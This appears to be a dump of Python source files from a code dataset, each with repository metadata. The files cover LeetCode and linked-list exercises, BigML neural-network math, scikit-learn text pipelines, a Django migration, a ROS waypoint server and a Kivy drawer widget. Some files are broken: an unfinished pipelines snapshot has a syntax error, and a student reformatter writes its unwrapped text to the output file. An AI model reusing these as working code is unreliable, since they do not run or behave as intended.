78970072af6b04d0d5817dcb82a22a137e0cf694 | 387400d70932b7b65f0ad0e24cb8290a8ce6ed46 | /August_18/129. Sum Root to Leaf Numbers.py | 01bbb2666f4a9e0dc162a013afb5256eadefec2e | [] | no_license | insigh/Leetcode | 0678fc3074b6294e8369756900fff32c7ce4e311 | 29113d64155b152017fa0a98e6038323d1e8b8eb | refs/heads/master | 2021-01-20T07:51:21.051366 | 2018-09-17T13:33:15 | 2018-09-17T13:33:15 | 90,051,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | """
Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.
An example is the root-to-leaf path 1->2->3 which represents the number 123.
Find the total sum of all root-to-leaf numbers.
Note: A leaf is a node with no children.
Example:
Input: [1,2,3]
1
/ \
2 3
Output: 25
Explanation:
The root-to-leaf path 1->2 represents the number 12.
The root-to-leaf path 1->3 represents the number 13.
Therefore, sum = 12 + 13 = 25.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return 0
self.res = []
self.dfs(root, '')
self.res = list(map(int, self.res))
return sum(self.res)
def dfs(self, node, temp):
if not node.left and not node.right:
self.res.append(temp + str(node.val))
# return
else:
if node.left:
self.dfs(node.left, temp + str(node.val))
if node.right:
self.dfs(node.right, temp + str(node.val))
| [
"zhangchaojie@ruc.edu.cn"
] | zhangchaojie@ruc.edu.cn |
29d251ed2774013737c30b03ac4211fbb47f0035 | 540789545998547d8f7d2732a8f2e9ffafcb4a93 | /bigml/laminar/math_ops.py | 0c39c5c0d9e95d5ba9041a77e1edcc9838515998 | [
"Apache-2.0"
] | permissive | davidifeoluwa/python | 801453adcc99a4eb0b92ef385ec20fa96f272f64 | b5dc03a4c695144250994261813bf39799a8c325 | refs/heads/master | 2020-03-11T04:01:21.906660 | 2018-04-03T16:26:49 | 2018-04-03T16:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,477 | py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2017-2018 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Activation functions and helpers in pure python
"""
import math
from bigml.laminar.constants import LARGE_EXP
def broadcast(fn):
def broadcaster(xs):
if len(xs) == 0:
return []
elif isinstance(xs[0], list):
return [fn(xvec) for xvec in xs]
else:
return fn(xs)
return broadcaster
def plus(mat, vec):
return [[r + v for r, v in zip(row, vec)] for row in mat]
def minus(mat, vec):
return [[r - v for r, v in zip(row, vec)] for row in mat]
def times(mat, vec):
return [[r * v for r, v in zip(row, vec)] for row in mat]
def divide(mat, vec):
return [[r / v for r, v in zip(row, vec)] for row in mat]
def dot(mat1, mat2):
out_mat = []
for row1 in mat1:
new_row = [sum(m1 * m2 for m1, m2 in zip(row1, row2)) for row2 in mat2]
out_mat.append(new_row)
return out_mat
def batch_norm(X, mean, stdev, shift, scale):
norm_vals = divide(minus(X, mean), stdev)
return plus(times(norm_vals, scale), shift)
def sigmoid(xs):
out_vec = []
for x in xs:
if x > 0:
if x < LARGE_EXP:
ex_val = math.exp(x)
out_vec.append(ex_val / (ex_val + 1))
else:
out_vec.append(1)
else:
if -x < LARGE_EXP:
out_vec.append(1 / (1 + math.exp(-x)))
else:
out_vec.append(0)
return out_vec
def softplus(xs):
return [math.log(math.exp(x) + 1) if x < LARGE_EXP else x for x in xs]
def softmax(xs):
xmax = max(xs)
exps = [math.exp(x - xmax) for x in xs]
sumex = sum(exps)
return [ex / sumex for ex in exps]
ACTIVATORS = {
'tanh': broadcast(lambda xs: [math.tanh(x) for x in xs]),
'sigmoid': broadcast(sigmoid),
'softplus': broadcast(softplus),
'relu': broadcast(lambda xs: [x if x > 0 else 0 for x in xs]),
'softmax': broadcast(softmax),
'identity': broadcast(lambda xs: [float(x) for x in xs])
}
def init_layers(layers):
return [dict(layer) for layer in layers]
def destandardize(vec, v_mean, v_stdev):
return [[v[0] * v_stdev + v_mean] for v in vec]
def to_width(mat, width):
if width > len(mat[0]):
ntiles = int(math.ceil(width / float(len(mat[0]))))
else:
ntiles = 1
output = [(row * ntiles)[:width] for row in mat]
return output
def add_residuals(residuals, identities):
to_add = to_width(identities, len(residuals[0]))
assert len(to_add[0]) == len(residuals[0])
return [[r + v for r, v in zip(rrow, vrow)]
for rrow, vrow in zip(residuals, to_add)]
def propagate(x_in, layers):
last_X = identities = x_in
for layer in layers:
w = layer['weights']
m = layer['mean']
s = layer['stdev']
b = layer['offset']
g = layer['scale']
afn = layer['activation_function']
X_dot_w = dot(last_X, w)
if m is not None and s is not None:
next_in = batch_norm(X_dot_w, m, s, b, g)
else:
next_in = plus(X_dot_w, b)
if layer['residuals']:
next_in = add_residuals(next_in, identities)
last_X = ACTIVATORS[afn](next_in)
identities = last_X
else:
last_X = ACTIVATORS[afn](next_in)
return last_X
def sum_and_normalize(youts, is_regression):
ysums = []
for i, row in enumerate(youts[0]):
sum_row = []
for j, _ in enumerate(row):
sum_row.append(sum([yout[i][j] for yout in youts]))
ysums.append(sum_row)
out_dist = []
if is_regression:
for ysum in ysums:
out_dist.append([ysum[0] / len(youts)])
else:
for ysum in ysums:
rowsum = sum(ysum)
out_dist.append([y / rowsum for y in ysum])
return out_dist
| [
"merce@bigml.com"
] | merce@bigml.com |
76d9ff4eb111325342e02d42d3862b6329453016 | 06919b9fd117fce042375fbd51d7de6bb9ae14fc | /py/tests/problems/linkedlist/loop_detect_test.py | 0120bef7fddaf215a3f2ca32b984123bbf69953c | [
"MIT"
] | permissive | bmoretz/Daily-Coding-Problem | 0caf2465579e81996869ee3d2c13c9ad5f87aa8f | f79e062e9f6e7b18b7e95c071fbe71ad104affcb | refs/heads/master | 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 | MIT | 2022-11-22T09:20:23 | 2019-12-06T17:17:00 | C++ | UTF-8 | Python | false | false | 1,243 | py | import unittest
from dcp.problems.linkedlist.node import build_ref_list
from dcp.problems.linkedlist.loop_detect import detect_loop1
class Test_DetectLoop1(unittest.TestCase):
@staticmethod
def set_loop(node, loop_back):
loop_node, prev = None, None
while node != None:
if node.data == loop_back:
loop_node = node
prev = node
node = node.next
prev.next = loop_node
def setUp(self):
pass
def test_case1(self):
assert detect_loop1(None) == None
def test_case2(self):
node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
self.set_loop(node, 'C')
actual = detect_loop1(node).data
expected = 'C'
assert actual == expected
def test_case3(self):
node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
self.set_loop(node, 'A')
actual = detect_loop1(node).data
expected = 'A'
assert actual == expected
def test_case4(self):
node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
self.set_loop(node, 'D')
actual = detect_loop1(node).data
expected = 'D'
assert actual == expected | [
"bmoretz@ionicsolutions.net"
] | bmoretz@ionicsolutions.net |
37803d71ba2811fec39a1deeee753f4bdc6deb73 | 4a869982cc4cc99d83df18465f545e51c97aeb37 | /.history/Baseline/ma-course-subjectivity-mining/pynlp/ml_pipeline/pipelines_20201015124127.py | 40b408e13f354ddad6524fd6ce7574e836258622 | [] | no_license | SorenKF/emotional_sm | 09d367421782d8c83987fb99be258b1b30c4ce8d | 63d51103f7511b19a83dec668327fcc7ea4a7f39 | refs/heads/main | 2023-02-03T14:12:14.572581 | 2023-01-24T18:06:52 | 2023-01-24T18:06:52 | 301,679,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,492 | py | from sklearn.pipeline import Pipeline, FeatureUnion
from ml_pipeline import preprocessing, representation
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
def pipeline(preprocessor, representation, classifier):
return Pipeline([('prep', preprocessor),
('frm', representation),
('clf', classifier)])
def combined_pipeline(prep1, repr1, prep2, repr2, classifier):
combined_features = FeatureUnion([
('token_features', Pipeline([('prep1', prep1), ('repr1', repr1)])),
('polarity_features', Pipeline([('prep2', prep2), ('repr2', repr2)]))])
return Pipeline([('features', combined_features),
('clf', classifier)])
# ------------- parametrization ---------------------------
def svm_clf_grid_parameters():
"""Example parameters for svm.LinearSVC grid search
The preprocessor and formatter can also be parametrized through the prefixes 'prep' and 'frm', respectively."""
return {'clf__class_weight': (None, 'balanced'),
'clf__dual': (True, False),
'clf__C': (0.1, 1, 10)}
# ------------- standard pipelines ---------------------------------
def naive_bayes_counts():
return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'min_df': 1}), MultinomialNB())
def naive_bayes_tfidf():
return pipeline(preprocessing.std_prep(), representation.tfidf_vectorizer(), MultinomialNB())
def svm_libsvc_counts():
return pipeline(preprocessing.std_prep(), representation.count_vectorizer(), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
def svm_libsvc_tfidf():
return pipeline(preprocessing.std_prep(), representation.tfidf_vectorizer(), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
def svm_libsvc_embed():
return pipeline(preprocessing.std_prep(), representation.text2embeddings('wiki-news'), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
def svm_sigmoid_embed():
return pipeline(preprocessing.std_prep(), representation.text2embeddings('glove'), svm.SVC(kernel='sigmoid',
gamma='scale'))
# ---------------- emotional_sm pipelines -----------------------------
# ----- BASELINE ---------------
# SVM with character 4-grams
# Ver 1 - using chargrams inside word boundaries.
# def svm_libsvc_char_4gram():
# return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char_wb', 'ngram_range':(4,4)}), svm.LinearSVC(max_iter=10000,
# dual=False, C=0.1))
# Ver 2 - using indescriminate char-4-grams.
def svm_libsvc_char_4gram():
return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char', 'ngram_range': (4, 4)}), svm.LinearSVC(max_iter=10000,
dual=False, C=0.1))
---------------
# Deepmoji embedding pipeline )hopefully=
def deepmoji_embed:
return pipeline(preprocessing.std_prep(), representation) | [
"s.k.f.fomsgaard@student.vu.nl"
] | s.k.f.fomsgaard@student.vu.nl |
24f069fc6d342348dc51bae9ba831ef54d23aa2d | 516d8b09391fcf6f1dd95fb665a617c4982af55d | /contact/migrations/0014_remove_contactuserpayam4_tarikhjavab.py | c50800d70842dbbe09b104e763f1bc2e8dfe3c43 | [] | no_license | rezmehp/abasian-peroject | 33eb357fbef3591b9cdd7d5a73fb2c90b62fb7a7 | 5c09a4d235719933f10688454066962dae13f3f5 | refs/heads/master | 2023-04-06T21:17:12.855048 | 2021-04-13T15:16:23 | 2021-04-13T15:16:23 | 235,763,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | # Generated by Django 3.0.2 on 2020-03-30 15:45
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('contact', '0013_auto_20200330_2013'),
]
operations = [
migrations.RemoveField(
model_name='contactuserpayam4',
name='tarikhjavab',
),
]
| [
"rezmehproject@gmail.com"
] | rezmehproject@gmail.com |
da1ab05092eedc735b9105d87a269a3ce7b359e0 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /rQkriLJBc9CbfRbJb_20.py | dda0425632ec74faa830b48d2c71f225b037b0bf | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py |
def index_of_caps(word):
liste = []
for i, j in enumerate(word):
if j.isupper() == True:
liste.append(i)
return liste
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
7827d8a029673449b0405f45876d99fbc56ab1ee | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_9/brdlia004/question2.py | f51e12c327875c64f8d15a6444ade3e2a4b02e7c | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 960 | py | """File reformatter"""
#Liam Brodie
#BRDLIA004
#11 May 2014
print("Enter the input filename:")
infile = input("")
file = open(infile,"r")
string = file.readlines()
file.close()
print("Enter the output filename:")
outfile = input("")
linelength = eval(input("Enter line width:\n"))
newS = ""
for line in string:
if line[-1] == "\n":
newS += line[:len(line)-1]
else:
newS += line
print(newS)
def newline(newS):
if(len(newS)==0):
return ""
else:
if(newS[:2]!='\n'):
Space = newS[:linelength].rfind(" ")
if(Space>0):
#print(Space*" ")
#print(newS[:Space+1])
return newS[:Space] + "\n" + str(newline(newS[Space+1:]))
else:
return newline(newS[2:])
output = open(outfile,"w")
outtext = newline(newS)
output.write(newS)
output.close() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
0d62ec6728b2d8109f68cc7705ee9fca73ad2cf3 | f6bdc0fa18bdf9c02417b7665eaec0a32f536df2 | /tj2_romi_ros/tj2_romi_waypoints/src/tj2_romi_waypoints_node.py | 75c099188a441cba5634730093fc119252492a18 | [] | no_license | frc-88/FRC-Romi-ROS | c677114a78a5a737ba49120d7a54e320525aa130 | 14506bab796c3ea62cd86310678fcd998507729b | refs/heads/main | 2023-03-29T20:28:14.000042 | 2021-04-03T18:42:39 | 2021-04-03T18:42:39 | 337,286,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,631 | py | #!/usr/bin/env python3
import os
import yaml
import math
from collections import OrderedDict
import rospy
import actionlib
import tf2_ros
import tf_conversions
import tf2_geometry_msgs
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import geometry_msgs
from std_msgs.msg import ColorRGBA
from std_srvs.srv import Trigger, TriggerResponse
from visualization_msgs.msg import MarkerArray
from visualization_msgs.msg import Marker
from tj2_romi_waypoints.srv import GetAllWaypoints, GetAllWaypointsResponse
from tj2_romi_waypoints.srv import GetWaypoint, GetWaypointResponse
from tj2_romi_waypoints.srv import DeleteWaypoint, DeleteWaypointResponse
from tj2_romi_waypoints.srv import SavePose, SavePoseResponse
from tj2_romi_waypoints.srv import SaveRobotPose, SaveRobotPoseResponse
from tj2_romi_waypoints.msg import FollowPathAction, FollowPathGoal, FollowPathResult
from state_machine import WaypointStateMachine
class TJ2RomiWaypoints:
def __init__(self):
self.node_name = "tj2_romi_waypoints"
rospy.init_node(
self.node_name
# disable_signals=True
# log_level=rospy.DEBUG
)
waypoints_path_param = rospy.get_param("~waypoints_path", "~/.ros/waypoints.yaml")
waypoints_path_param = os.path.expanduser(waypoints_path_param)
self.map_frame = rospy.get_param("~map", "map")
self.base_frame = rospy.get_param("~base_link", "base_link")
self.marker_size = rospy.get_param("~marker_size", 0.25)
self.marker_color = rospy.get_param("~marker_color", (0.0, 0.0, 1.0, 1.0))
assert (type(self.marker_color) == tuple or type(self.marker_color) == list), "type(%s) != tuple or list" % type(self.marker_color)
assert len(self.marker_color) == 4, "len(%s) != 4" % len(self.marker_color)
self.waypoints_path = self.process_path(waypoints_path_param)
self.waypoint_config = OrderedDict()
self.markers = MarkerArray()
self.marker_poses = OrderedDict()
self.load_from_path() # load waypoints
self.tf_buffer = tf2_ros.Buffer()
self.tf_listener = tf2_ros.TransformListener(self.tf_buffer)
self.state_machine = WaypointStateMachine()
self.marker_pub = rospy.Publisher("waypoint_markers", MarkerArray, queue_size=25)
self.reload_waypoints_srv = self.create_service("reload_waypoints", Trigger, self.reload_waypoints_callback)
self.get_all_waypoints_srv = self.create_service("get_all_waypoints", GetAllWaypoints, self.get_all_waypoints_callback)
self.get_waypoint_srv = self.create_service("get_waypoint", GetWaypoint, self.get_waypoint_callback)
self.delete_waypoint_srv = self.create_service("delete_waypoint", DeleteWaypoint, self.delete_waypoint_callback)
self.save_pose_srv = self.create_service("save_pose", SavePose, self.save_pose_callback)
self.save_robot_pose_srv = self.create_service("save_robot_pose", SaveRobotPose, self.save_robot_pose_callback)
self.follow_path_server = actionlib.SimpleActionServer("follow_path", FollowPathAction, self.follow_path_callback, auto_start=False)
self.follow_path_server.start()
# ---
# Action callback
# ---
def follow_path_callback(self, goal):
waypoints = []
for name in goal.waypoints:
if not self.check_name(name):
rospy.logwarn("Waypoint name '%s' is registered. Skipping" % name)
continue
waypoint = self.get_waypoint(name)
pose = self.waypoint_to_pose(waypoint)
waypoints.append(pose)
self.state_machine.execute(waypoints, self.follow_path_server)
# ---
# Service callbacks
# ---
def get_all_waypoints_callback(self, req):
waypoints = self.get_all_waypoints()
names = self.get_all_names()
pose_array = self.waypoints_to_pose_array(waypoints)
return GetAllWaypointsResponse(pose_array, names)
def get_waypoint_callback(self, req):
if not self.check_name(req.name):
return False
waypoint = self.get_waypoint(req.name)
pose = self.waypoint_to_pose(waypoint)
return GetWaypointResponse(pose)
def delete_waypoint_callback(self, req):
if not self.check_name(req.name):
return False
success = self.pop_waypoint(req.name)
return DeleteWaypointResponse(success)
def save_pose_callback(self, req):
success = self.save_from_pose(req.name, req.waypoint)
return SavePoseResponse(success)
def save_robot_pose_callback(self, req):
success = self.save_from_current(req.name)
return SaveRobotPoseResponse(success)
def reload_waypoints_callback(self, req):
if self.load_from_path():
return TriggerResponse(True, self.waypoints_path)
else:
return TriggerResponse(False, self.waypoints_path)
# ---
# Service creation macros
# ---
def create_service(self, name, srv_type, callback):
name = self.node_name + "/" + name
service_name = name + "_service_name"
self.__dict__[service_name] = name
rospy.loginfo("Setting up service %s" % name)
srv_obj = rospy.Service(name, srv_type, callback)
rospy.loginfo("%s service is ready" % name)
return srv_obj
def listen_for_service(self, name, srv_type):
service_name = name + "_service_name"
self.__dict__[service_name] = name
rospy.loginfo("Waiting for service %s" % name)
srv_obj = rospy.ServiceProxy(name, srv_type)
rospy.loginfo("%s service is ready" % name)
return srv_obj
# ---
# File manipulations
# ---
def load_from_path(self):
if not self.initialize_file():
return False
try:
with open(self.waypoints_path) as file:
config = yaml.safe_load(file)
if config is None:
self.waypoint_config = OrderedDict()
else:
self.waypoint_config = config
self.all_waypoints_to_markers()
return True
except BaseException as e:
rospy.logwarn("Failed to load waypoints file '%s'. %s" % (self.waypoints_path, e))
return False
def initialize_file(self):
# If file doesn't exist, create directories and empty file
if os.path.isfile(self.waypoints_path):
return True
waypoints_dir = os.path.dirname(self.waypoints_path)
if not os.path.isdir(waypoints_dir):
os.makedirs(waypoints_dir)
with open(self.waypoints_path, 'w') as file:
file.write("")
rospy.logwarn("Waypoints file '%s' doesn't exist. Creating file." % self.waypoints_path)
return False
def process_path(self, waypoints_path):
map_name = os.path.basename(waypoints_path)
waypoints_dir = os.path.dirname(waypoints_path)
if len(waypoints_dir) == 0:
waypoints_dir = os.path.expanduser("~/.ros")
waypoints_name = os.path.splitext(map_name)[0]
waypoints_name += ".yaml"
waypoints_path = os.path.join(waypoints_dir, waypoints_name)
return waypoints_path
def save_to_path(self):
try:
with open(self.waypoints_path, 'w') as file:
for name, waypoint in self.waypoint_config.items():
yaml.safe_dump({name: waypoint}, file)
return True
except BaseException as e:
rospy.logwarn("Failed to save waypoints file '%s'. %s" % (self.waypoints_path, e))
return False
# ---
# Node methods
# ---
def check_name(self, name):
if name not in self.waypoint_config:
return False
if name not in self.marker_poses:
rospy.logwarn("Waypoint name %s was added, but wasn't a registered marker! Adding." % name)
pose = self.waypoint_to_pose(self.get_waypoint(name))
self.add_marker(name, pose)
return True
def save_from_pose(self, name, pose):
# name: str, name of waypoint
# pose: geometry_msgs.msg.PoseStamped
# returns: bool, whether the file was successfully written to
self.waypoint_config[name] = self.pose_to_waypoint(pose)
self.add_marker(name, pose)
return self.save_to_path()
def save_from_current(self, name):
# name: str, name of waypoint
# returns: bool, whether the file was successfully written to and whether the tf lookup was successful
try:
current_tf = self.tf_buffer.lookup_transform(self.map_frame, self.base_frame, rospy.Time(0), rospy.Duration(1.0))
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as e:
rospy.logwarn("Failed to look up %s to %s. %s" % (self.map_frame, self.base_frame, e))
return False
pose = geometry_msgs.msg.PoseStamped()
pose.header.frame_id = self.map_frame
pose.pose.position = current_tf.transform.translation
pose.pose.orientation = current_tf.transform.rotation
return self.save_from_pose(name, pose)
def save_from_object(self, name):
# name: str, name of waypoint
return False
def get_waypoint(self, name):
# name: str, name of waypoint
# returns: list, [x, y, theta]
return self.waypoint_config[name]
def pop_waypoint(self, name):
# name: str, name of waypoint
# returns: list, [x, y, theta]
self.delete_marker(name)
self.waypoint_config.pop(name)
return self.save_to_path()
def get_all_waypoints(self):
# returns: list, [[x, y, theta], ...]
return [waypoint for waypoint in self.waypoint_config.values()]
def get_all_names(self):
# returns: list, [str, ...] waypoint names
return [name for name in self.waypoint_config.keys()]
# ---
# Conversion methods
# ---
def pose_to_waypoint(self, pose):
# pose: geometry_msgs.msg.PoseStamped
# returns: list, [x, y, theta]
yaw = euler_from_quaternion([
pose.pose.orientation.x,
pose.pose.orientation.y,
pose.pose.orientation.z,
pose.pose.orientation.w,
])[2]
return [pose.pose.position.x, pose.pose.position.y, yaw]
def waypoint_to_pose(self, waypoint):
# waypoint: list, [x, y, theta]
# returns: geometry_msgs.msg.PoseStamped
quat = quaternion_from_euler(0.0, 0.0, waypoint[2])
pose = geometry_msgs.msg.PoseStamped()
pose.header.frame_id = self.map_frame
pose.pose.position.x = waypoint[0]
pose.pose.position.y = waypoint[1]
pose.pose.orientation.x = quat[0]
pose.pose.orientation.y = quat[1]
pose.pose.orientation.z = quat[2]
pose.pose.orientation.w = quat[3]
return pose
def waypoints_to_pose_array(self, waypoints):
# waypoint: list, [[x, y, theta], ...]
# returns: geometry_msgs.msg.PoseArray
pose_array = geometry_msgs.msg.PoseArray()
pose_array.header.frame_id = self.map_frame
for waypoint in waypoints:
pose = self.waypoint_to_pose(waypoint)
pose_array.poses.append(pose.pose)
return pose_array
# ---
# Waypoint visualization
# ---
def all_waypoints_to_markers(self):
self.marker_poses = OrderedDict()
for name, waypoint in self.waypoint_config.items():
self.marker_poses[name] = self.waypoint_to_pose(waypoint)
self.update_markers()
def add_marker(self, name, pose):
self.marker_poses[name] = pose
self.update_markers()
def delete_marker(self, name):
self.marker_poses.pop(name)
self.update_markers()
def update_markers(self):
self.markers = MarkerArray()
for name, pose in self.marker_poses.items():
position_marker = self.make_marker(name, pose)
text_marker = self.make_marker(name, pose)
self.prep_position_marker(position_marker)
text_marker.type = Marker.TEXT_VIEW_FACING
text_marker.ns = "text" + text_marker.ns
text_marker.text = name
text_marker.scale.x = 0.0
text_marker.scale.y = 0.0
self.markers.markers.append(position_marker)
self.markers.markers.append(text_marker)
def prep_position_marker(self, position_marker):
position_marker.type = Marker.ARROW
position_marker.ns = "pos" + position_marker.ns
position_marker.color.a = 0.75
position_marker.scale.x = self.marker_size / 4.0
position_marker.scale.y = self.marker_size / 2.5
position_marker.scale.z = self.marker_size / 2.0
p1 = geometry_msgs.msg.Point()
p2 = geometry_msgs.msg.Point()
p2.x = self.marker_size
position_marker.points.append(p1)
position_marker.points.append(p2)
def make_marker(self, name, pose):
# name: str, marker name
# pose: geometry_msgs.msg.PoseStamped
marker = Marker()
marker.action = Marker.ADD
marker.pose = pose.pose
marker.header.frame_id = self.map_frame
marker.lifetime = rospy.Duration(1.0) # seconds
marker.ns = name
marker.id = 0 # all waypoint names should be unique
scale_vector = geometry_msgs.msg.Vector3()
scale_vector.x = self.marker_size
scale_vector.y = self.marker_size
scale_vector.z = self.marker_size
marker.scale = scale_vector
marker.color = ColorRGBA(
r=self.marker_color[0],
g=self.marker_color[1],
b=self.marker_color[2],
a=self.marker_color[3],
)
return marker
def publish_markers(self):
if len(self.markers.markers) != 0:
self.marker_pub.publish(self.markers)
# ---
# Run
# ---
def run(self):
rate = rospy.Rate(3.0)
while not rospy.is_shutdown():
self.publish_markers()
rate.sleep()
def main():
node = TJ2RomiWaypoints()
try:
node.run()
except rospy.ROSInterruptException:
pass
finally:
rospy.loginfo("Exiting %s node" % node.node_name)
if __name__ == "__main__":
main()
| [
"woz4tetra@gmail.com"
] | woz4tetra@gmail.com |
4d6a87ecdb5ea24eb88b724c2eb6a34cebff36f0 | fe31c3cb21bac1cf7d06bb8dbb00ad7c09994403 | /afternoon_python/venv/Tuples_Lists_Dictionaries.py | 48f7408d63dc1905bd9303656c8225f857ddf067 | [] | no_license | bsakari/Python-Projects | 87718827daa9ff4ac16bf0855e04cadef329aa1d | 41104d8d1df84c27255f2d221ff68f219de8c84f | refs/heads/master | 2020-03-21T03:16:42.332439 | 2018-06-20T14:39:34 | 2018-06-20T14:39:34 | 138,045,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # () tuple Cannot be updated
# [] list Can be updated
# {} dictionary Cannot also be updated
name1 = ("King","mimi","wewe",9,2.5,("two",7,2.5,"yes"))
# print(name1)
# print(name1[5])
# print(name1[0:4])
# print(name1[1:])
name2 = ["King","mimi","wewe",9,2.5,("two",7,2.5,"yes")]
print(name2)
# print(name2[5])
# print(name2[0:4])
# print(name2[1:])
name2[0] = "Mfalme"
print(name2)
name3 = {"King","mimi","wewe",9,2.5,("two",7,2.5,"yes")}
print(name3)
# print(name3[5])
# print(name3[0:4])
# print(name3[1:])
| [
"sakaribenjamin@gmail.com"
] | sakaribenjamin@gmail.com |
389026db81519bc1f589892bb1a1714505a3b1ed | 5068bc927a7fff73923ce95862ff70120160c491 | /electrum_axe/gui/kivy/uix/drawer.py | d94e14494f89c86ae344d59ee0b866ca609fc9ea | [
"MIT"
] | permissive | AXErunners/electrum-axe | cdbce2dbb92e23e32e9f9b733ae9f65f51c0ae9f | 7ef05088c0edaf0688fb167df353d6da619ebf2f | refs/heads/master | 2021-04-03T09:40:37.109317 | 2020-08-27T16:53:18 | 2020-08-27T16:53:18 | 124,705,752 | 336 | 75 | MIT | 2020-10-17T18:30:25 | 2018-03-10T23:00:48 | Python | UTF-8 | Python | false | false | 8,494 | py | '''Drawer Widget to hold the main window and the menu/hidden section that
can be swiped in from the left. This Menu would be only hidden in phone mode
and visible in Tablet Mode.
This class is specifically in lined to save on start up speed(minimize i/o).
'''
from kivy.app import App
from kivy.factory import Factory
from kivy.properties import OptionProperty, NumericProperty, ObjectProperty
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.logger import Logger
import gc
# delayed imports
app = None
class Drawer(Factory.RelativeLayout):
'''Drawer Widget to hold the main window and the menu/hidden section that
can be swiped in from the left. This Menu would be only hidden in phone mode
and visible in Tablet Mode.
'''
state = OptionProperty('closed',
options=('closed', 'open', 'opening', 'closing'))
'''This indicates the current state the drawer is in.
:attr:`state` is a `OptionProperty` defaults to `closed`. Can be one of
`closed`, `open`, `opening`, `closing`.
'''
scroll_timeout = NumericProperty(200)
'''Timeout allowed to trigger the :data:`scroll_distance`,
in milliseconds. If the user has not moved :data:`scroll_distance`
within the timeout, the scrolling will be disabled and the touch event
will go to the children.
:data:`scroll_timeout` is a :class:`~kivy.properties.NumericProperty`
and defaults to 200 (milliseconds)
'''
scroll_distance = NumericProperty('9dp')
'''Distance to move before scrolling the :class:`Drawer` in pixels.
As soon as the distance has been traveled, the :class:`Drawer` will
start to scroll, and no touch event will go to children.
It is advisable that you base this value on the dpi of your target
device's screen.
:data:`scroll_distance` is a :class:`~kivy.properties.NumericProperty`
and defaults to 20dp.
'''
drag_area = NumericProperty('9dp')
'''The percentage of area on the left edge that triggers the opening of
the drawer. from 0-1
:attr:`drag_area` is a `NumericProperty` defaults to 2
'''
hidden_widget = ObjectProperty(None)
''' This is the widget that is hidden in phone mode on the left side of
drawer or displayed on the left of the overlay widget in tablet mode.
:attr:`hidden_widget` is a `ObjectProperty` defaults to None.
'''
overlay_widget = ObjectProperty(None)
'''This a pointer to the default widget that is overlayed either on top or
to the right of the hidden widget.
'''
def __init__(self, **kwargs):
super(Drawer, self).__init__(**kwargs)
self._triigger_gc = Clock.create_trigger(self._re_enable_gc, .2)
def toggle_drawer(self):
if app.ui_mode[0] == 't':
return
Factory.Animation.cancel_all(self.overlay_widget)
anim = Factory.Animation(x=self.hidden_widget.width
if self.state in ('opening', 'closed') else 0,
d=.1, t='linear')
anim.bind(on_complete = self._complete_drawer_animation)
anim.start(self.overlay_widget)
def _re_enable_gc(self, dt):
global gc
gc.enable()
def on_touch_down(self, touch):
if self.disabled:
return
if not self.collide_point(*touch.pos):
return
touch.grab(self)
# disable gc for smooth interaction
# This is still not enough while wallet is synchronising
# look into pausing all background tasks while ui interaction like this
gc.disable()
global app
if not app:
app = App.get_running_app()
# skip on tablet mode
if app.ui_mode[0] == 't':
return super(Drawer, self).on_touch_down(touch)
state = self.state
touch.ud['send_touch_down'] = False
start = 0 #if state[0] == 'c' else self.hidden_widget.right
drag_area = self.drag_area\
if self.state[0] == 'c' else\
(self.overlay_widget.x)
if touch.x < start or touch.x > drag_area:
if self.state == 'open':
self.toggle_drawer()
return
return super(Drawer, self).on_touch_down(touch)
self._touch = touch
Clock.schedule_once(self._change_touch_mode,
self.scroll_timeout/1000.)
touch.ud['in_drag_area'] = True
touch.ud['send_touch_down'] = True
return
